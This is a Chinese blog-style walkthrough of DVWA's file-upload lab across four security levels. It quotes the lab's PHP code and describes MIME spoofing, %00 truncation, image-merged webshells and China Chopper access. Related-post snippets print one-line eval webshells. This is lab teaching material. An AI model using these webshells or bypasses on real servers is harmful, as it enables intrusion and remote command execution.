dvwa上传php文件,DVWA之文件上传漏洞

最新推荐文章于 2024-07-21 04:03:36 发布
最新推荐文章于 2024-07-21 04:03:36 发布
阅读量456 收藏
点赞数
文章标签: dvwa上传php文件

File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞。

509e78d96957

图片.png

LOW

服务端代码:

if( isset( $_POST[ 'Upload' ] ) ) {

// Where are we going to be writing to?

$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";

$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

// Can we move the file to the upload folder?

if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {

// No

echo '

Your image was not uploaded.
';

}

else {

// Yes!

echo "

{$target_path} succesfully uploaded!
";

}

}

?>

basename(path,suffix) :函数返回路径中的文件名部分,如果可选参数suffix为空,则返回的文件名包含后缀名,反之不包含后缀名。

可以看到,服务器对上传文件的类型、内容没有做任何的检查、过滤,存在明显的文件上传漏洞,生成上传路径后,服务器会检查是否上传成功并返回相应提示信息。

文件上传漏洞的利用是有限制条件的,首先当然是要能够成功上传木马文件,其次上传文件必须能够被执行,最后就是上传文件的路径必须可知。不幸的是,这里三个条件全都满足。

上传文件MM.php(一句话木马)

509e78d96957

图片.png

509e78d96957

图片.png

打开中国菜刀,右键添加,

参数名(一句话木马口令)MUMA

509e78d96957

图片.png

配置信息不知道可不填

然后菜刀就会通过向服务器发送包含MUMA参数的post请求,在服务器上执行任意命令,获取webshell权限。

可以下载、修改服务器的所有文件。

509e78d96957

图片.png

Medium(中)

源代码:

if( isset( $_POST[ 'Upload' ] ) ) {

// Where are we going to be writing to?

$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";

$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

// File information

$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];

$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];

$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

// Is it an image?

if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&

( $uploaded_size < 100000 ) ) {

// Can we move the file to the upload folder?

if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {

// No

echo '

Your image was not uploaded.
';

}

else {

// Yes!

echo "

{$target_path} succesfully uploaded!
";

}

}

else {

// Invalid file

echo '

Your image was not uploaded. We can only accept JPEG or PNG images.
';

}

}

?>

可以看到,Medium级别的代码对上传文件的类型、大小做了限制,要求文件类型必须是jpeg或者png,大小不能超过100000B(约为97.6KB)。

1.文件包含+文件上传

因为采用的是一句话木马,所以文件大小不会有问题,至于文件类型的检查,尝试修改文件名为MM.png。

509e78d96957

图片.png

上传成功

上菜刀:

509e78d96957

图片.png

509e78d96957

图片.png

虽然成功上传了文件,但是并不能成功获取webshell权限,

中国菜刀的原理是向上传文件发送包含MUMA参数的post请求,通过控制MUMA参数来执行不同的命令,而这里服务器将木马文件解析成了图片文件,因此向其发送post请求时,服务器只会返回这个“图片”文件,并不会执行相应命令。

那么如何让服务器将其解析为php文件呢?我们想到文件包含漏洞程。这里可以借助Medium级别的文件包含漏洞来获取webshell权限,打开中国菜刀,右键添加,在地址栏中输入

509e78d96957

图片.png

2.抓包修改文件类型

上传Mm.png文件,抓包。

509e78d96957

图片.png

修改为php文件。。

509e78d96957

图片.png

上传成功

上菜刀:

509e78d96957

图片.png

3.截断绕过规则

在php版本小于5.3.4的服务器中,当Magic_quote_gpc选项为off时,可以在文件名中使用%00截断,所以可以把上传文件命名为MM.php%00.png。

High

源代码:

if( isset( $_POST[ 'Upload' ] ) ) {

// Where are we going to be writing to?

$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";

$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

// File information

$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];

$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);

$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];

// Is it an image?

if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&

( $uploaded_size < 100000 ) &&

getimagesize( $uploaded_tmp ) ) {

// Can we move the file to the upload folder?

if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {

// No

echo '

Your image was not uploaded.
';

}

else {

// Yes!

echo "

{$target_path} succesfully uploaded!
";

}

}

else {

// Invalid file

echo '

Your image was not uploaded. We can only accept JPEG or PNG images.
';

}

}

?>

strtolower() : 函数把字符串转换为小写。

strrpos(string,find,start) :函数返回字符串find在另一字符串string中最后一次出现的位置,如果没有找到字符串则返回false,可选参数start规定在何处开始搜索。

getimagesize(string filename) :函数会通过读取文件头,返回图片的长、宽等信息,如果没有相关的图片文件头,函数会报错。

可以看到,High级别的代码读取文件名中最后一个”.”后的字符串,期望通过文件名来限制文件类型,因此要求上传文件名形式必须是”.jpg”、”.jpeg” 、”*.png”之一。同时,getimagesize函数更是限制了上传文件的文件头必须为图像类型。

1.采用%00截断的方法可以轻松绕过文件名的检查,但是需要将上传文件的文件头伪装成图片,只能在php版本小于5.3.4的服务器中

2.借助High级别的文件包含漏洞来完成攻击。

首先利用copy将一句话木马文件php.php与图片文件timg.jpg合并

509e78d96957

图片.png

509e78d96957

图片.png

生成新图片

509e78d96957

图片.png

记事本打开后,可以看到一句话木马

509e78d96957

图片.png

但是上传不了,怎么看都没错,突然发现是图片太大了,随便找了张

509e78d96957

图片.png

会报错。。

然后换张小的,,

509e78d96957

图片.png

509e78d96957

图片.png

上传成功。。

上菜刀,右键添加shell,地址栏填入

没成功

509e78d96957

图片.png

不知道什么原因

Impossible

服务器核心代码:

if( isset( $_POST[ 'Upload' ] ) ) {

// Check Anti-CSRF token

checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

// File information

$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];

$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);

$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];

$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];

// Where are we going to be writing to?

$target_path = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';

//$target_file = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';

$target_file = md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;

$temp_file = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );

$temp_file .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;

// Is it an image?

if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&

( $uploaded_size < 100000 ) &&

( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&

getimagesize( $uploaded_tmp ) ) {

// Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)

if( $uploaded_type == 'image/jpeg' ) {

$img = imagecreatefromjpeg( $uploaded_tmp );

imagejpeg( $img, $temp_file, 100);

}

else {

$img = imagecreatefrompng( $uploaded_tmp );

imagepng( $img, $temp_file, 9);

}

imagedestroy( $img );

// Can we move the file to the web root from the temp folder?

if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {

// Yes!

echo "

${target_file} succesfully uploaded!
";

}

else {

// No

echo '

Your image was not uploaded.
';

}

// Delete any temp files

if( file_exists( $temp_file ) )

unlink( $temp_file );

}

else {

// Invalid file

echo '

Your image was not uploaded. We can only accept JPEG or PNG images.
';

}

}

// Generate Anti-CSRF token

generateSessionToken();

?>

in_get(varname) :函数返回相应选项的值

imagecreatefromjpeg ( filename ) :函数返回图片文件的图像标识,失败返回false

imagejpeg ( image , filename , quality) :从image图像以filename为文件名创建一个JPEG图像,可选参数quality,范围从 0(最差质量,文件更小)到 100(最佳质量,文件最大)。

imagedestroy( img ) : 函数销毁图像资源

可以看到,Impossible级别的代码对上传文件进行了重命名(为md5值,导致%00截断无法绕过过滤规则),加入Anti-CSRF token防护CSRF攻击,同时对文件的内容作了严格的检查,导致攻击者无法上传含有恶意脚本的文件。

weixin_39941792
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpstudy8.1与dvwa安装
啊哈
04-09 906
整个搭建的步骤: 1.下载、安装PhpStudy 2.下载、存放DVWA 3.配置DVWA环境 4.访问DVWA进行登录 先下载phpstudy,https://www.xp.cn/download.html, dvwa下载官网:http://www.phpstudy.net/ 网址复制到浏览器地址栏打开也行 下载、安装PhpStudy 在官网下载phpstudy的安装包(是一个压缩包)对此压缩包进行解压到D盘,如下图:: 打开文件夹,双击运行phpstudy_64_8.1.0.6.exe安装程序,开始进
DVWAPHP文件上传漏洞(File Upload
热门推荐
Mi1k7ea
01-22 1万+
文件上传漏洞是指由于服务器对于用户上传部分的控制不严格导致攻击者可以上传一个恶意的可执行的文件到服务器。简单点说,就是用户直接或者通过各种绕过方式将webshell上传到服务器中进而执行利用。 首先保存一句话木马为1.php文件: 另外对于上传文件,可在DVWA的服务器中(本人用的是Metasploitable虚拟机)以下路径找到: /var/www/dvwa/hackab
dvwa上传php文件,DVWA下的文件上传(上)
weixin_39869197的博客
03-18 128
File Upload(文件上传)漏洞:由于对用户上传文件的类型、内容没有进行严格的审查,使得攻击者可以通过上传含有执行脚本的木马文件操纵服务器,因此文件上传漏洞带来的危害常常是毁灭性的。low级别:if(isset($_POST[‘Upload’])){//Wherearewegoingtobewritingto?$target_path=DVWA_WEB_P...
DVWA靶场】web安全漏洞-文件上传+文件包含(详细复现教程)
最新发布
weixin_60838266的博客
07-21 1436
DVWA靶场漏洞复现之文件上传+文件包含。
dvwa上传php文件,DVWA—File Upload 文件上传
weixin_29090089的博客
03-18 160
Low源代码:if( isset( $_POST[ 'Upload' ] ) ) {// Where are we going to be writing to?$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] )...
DVWA文件上传漏洞
Feng_Blue_的博客
10-19 728
low等级 通过分析源代码,第一条只是分析上传是否为空,第二句则是文件上传路径,第三条则是名字,可以看到,服务器对上传文件的类型、内容没有做任何的检查、过滤,存在明显的文件上传漏洞,生成上传路径后,服务器会检查是否上传成功并返回相应提示信息。 如果上传成功,则会提示 路径+succesfully uploaded! 如果上传失败,则会提示 Your image was not uploaded。 我们尝试上传一个一句话木马 使用菜刀链接 菜刀可以完全访问 Medi...
DVWA靶场-文件上传漏洞
Cobra的博客
01-27 1420
DVWA靶场-文件上传 一、low级别 1、该级别没有任何防护,直接.php文件上传即可。 二、Medium级别 1、我们先尝试上传.php文件,发现上传失败。 2、我们使用burp suite抓包, 把上传PHP文件伪装成image/jpeg文件再进行上传。 3、修改Content-Type为可执行的后缀名之后,在进行上传即可成功上传。 三、High级别 1、我们尝试上传.php文件,发现上传失败。 2、我们可以利用一句话木马来进行绕过。 ...
DVWA--文件上传漏洞
xiaoxiao的博客
11-28 1496
文件上传漏洞定义 文件上传漏洞通常是由于上传文件的类型、内容没有进行严格的过滤检查,使得可以通过上传webshell获取服务器权限,因此文件上传漏洞带来的危害通常是毁灭性的。 文件上传漏洞的前提 能上传的木马 上传的木马可执行 还要清楚上传后的路径 实现过程 LOW级别 源码 basename(path,suffix):返回path中的文件名部分,如果可选参数suffix为空,则返回的文...
DVWA文件上传漏洞
sunshine1_0的博客
01-20 1747
文件上传漏洞 低级别 中等级别 高级别
DVWA文件上传漏洞
极光时流
03-31 657
Low 没有进行任何过滤 首相,上传一个phpinfo.php,其内代码如下: <?php phpinfo(); ?> 上传路径:http://127.0.0.1/DVWA-1.9/hackable/uploads/phpinfo.php 然后访问 首先,写好 说明存在上传和执行漏洞 上传一句话木马: <?php @eval($_POST[“hack”]); ?>...
DVWA文件上传漏洞
HoYim
03-27 787
文件上传漏洞 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传文件可以是木马,病毒,恶意脚本或者WebShell等。 1 Webshell简介 WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称之为一种网页后门。攻击者在入侵了一个网站后,通常会将这些asp或php后门文件与网站服务器web目录下正常的网页文件混在一起,...
dvwa没有file1.php,文件包含漏洞-DVWA
weixin_35315373的博客
03-13 361
一、进入DVWA测试系统选择左侧File Inclusion(文件包含)菜单,内容页显示为:解决方法:进入php.ini,将allow_url_include=Off修改为On即可。二、实验步骤:2.1 File Inclusion(Low 级别)a) 分析文件包含漏洞测试网页可以看到,文件包含网页上的内容显示:通过点击file1.php或者file2.php或者file3.php文件,然后通过G...
DVWA 文件包含及上传漏洞
Starr
03-07 2112
文章目录1. DVWA File InclusionLow levelMedium levelHigh levelImpossible level2. DVWA File uploadLow levelMedium levelHigh levelImpossible Level 1. DVWA File Inclusion Low level url路径: /dvwa/vulnerabilities/fi/index.php?page=include.php 可以看出page参数对应的php会被包含,尝试
上传文件白名单_十大常见web漏洞——文件上传漏洞
weixin_39614521的博客
01-15 1516
漏洞介绍在我们浏览网页时,文件上传是非常常见的,比如我们会上传头像、附件、视频等文件文件上传漏洞通常由于网页代码中的文件上传路径变量过滤不严造成的,如果文件上传功能实现代码没有严格限制用户上传文件后缀以及文件类型,比如上传头像的时候,按道理用户只能上传图片类型的文件,但是如果代码没有限制文件类型,攻击者可通过 Web 访问的目录上传任意文件,包括网站后门文件(webshell),进而远程控制网...
那些方法可以绕过服务器对文件内容的检测,文件上传漏洞
weixin_34739646的博客
08-13 2518
文件上传文件上传就是在一些web应用中允许用户上传图片,文本等相应文件到服务器指定的位置。而文件上传漏洞就是利用这些可以上传的地方将恶意代码植入到服务器中,之后通过url去访问以执行代码达到攻击的目的。可以成功攻击的条件1.存放上传文件的目录要有执行脚本的权限,也就是文件能够被解析执行。2.可以通过web访问这个文件。3.知道文件上传后的路径和文件名称,有的web应用会修改上传文件文件名称。上传...
DVWA靶场之文件上传(三个等级)
m0_55854679的博客
05-02 9412
文件上传 文件上传的要点:(1)绕过题目的各种过滤手段成功上传文件并且不被删除; (2)确保文件可以正常运行; (3)确保文件可以执行命令。 一句话木马(简称Webshell) <?php @eval($_POST['cmd']); ?> 基本原理 利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过蚁剑或者中国菜刀即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。$_POST['cmd']表示从页面中获
DVWA [File Upload] [文件上传漏洞]
weixin_45253622的博客
05-20 817
目录 Low Medium High Impossible 漏洞防御 Low 源码: <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; //上传文件的路径 $target_path .= basename( $_FILES[
上传漏洞讲解(2)
自学编程_youkewang.top
03-12 358
上一篇讲了文件上传漏洞和解析漏洞的基础,这一篇讲通过DVWA测试上传漏洞。注意DVWA安装时要在'config.inc.php'文件中填写数据库密码(默认为空)。配置好后默认帐号密码为:admin/password低等级源码(未进行任何过滤):&lt;?php if (isset($_POST['Upload'])) {          $target_pat...
DVWA安全实验:文件上传与包含漏洞分析
DVWA文件包含模块(级别low)中,攻击者可以利用已上传的shell.php文件,通过URL直接引用该文件,触发PHP文件包含漏洞,调用eval函数执行shell.php中的代码,从而获取PHP的详细信息,例如通过phpinfo()函数。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值